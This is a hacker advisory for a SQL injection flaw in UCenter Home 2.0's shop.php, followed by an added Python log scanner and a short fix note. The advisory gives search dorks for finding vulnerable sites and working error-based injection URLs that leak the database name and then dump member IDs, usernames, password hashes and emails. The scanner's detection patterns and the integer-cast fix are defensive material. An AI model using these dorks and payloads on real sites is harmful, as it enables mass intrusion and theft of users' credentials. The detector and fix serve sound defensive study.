__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

To inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Now edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
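
Added example, not part of the original advisory: a log check for the requests described above. It flags any shop.php request whose shopid is not a plain integer and tags the error-based markers seen in the strings above. The log lines, the function name scan and the tag names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines: addresses, times and sizes are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?ac=view&shopid=12%27 HTTP/1.1" 200 640',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /space.php?uid=3 HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PLAIN_ID = re.compile(r"[0-9]+")
# Markers taken from the strings in the advisory; the tag names are illustrative.
MARKERS = {
    "rand-group-by": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S),
    "information_schema": re.compile(r"information_schema", re.I),
    "uc_members": re.compile(r"\buc_members\b", re.I),
}

def scan(lines):
    """Return (line number, client, tags) for each suspicious shopid value."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/shop.php"):
            continue
        # parse_qs percent-decodes the value, so encoded payloads are matched too.
        for value in parse_qs(url.query).get("shopid", []):
            if PLAIN_ID.fullmatch(value):
                continue  # a legitimate shop id is digits only
            tags = [name for name, rx in MARKERS.items() if rx.search(value)]
            findings.append((number, client, tags or ["non-numeric"]))
    return findings

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

On the application side the corresponding fix is to cast shopid to an integer, or bind it as a query parameter, before it reaches the SQL statement.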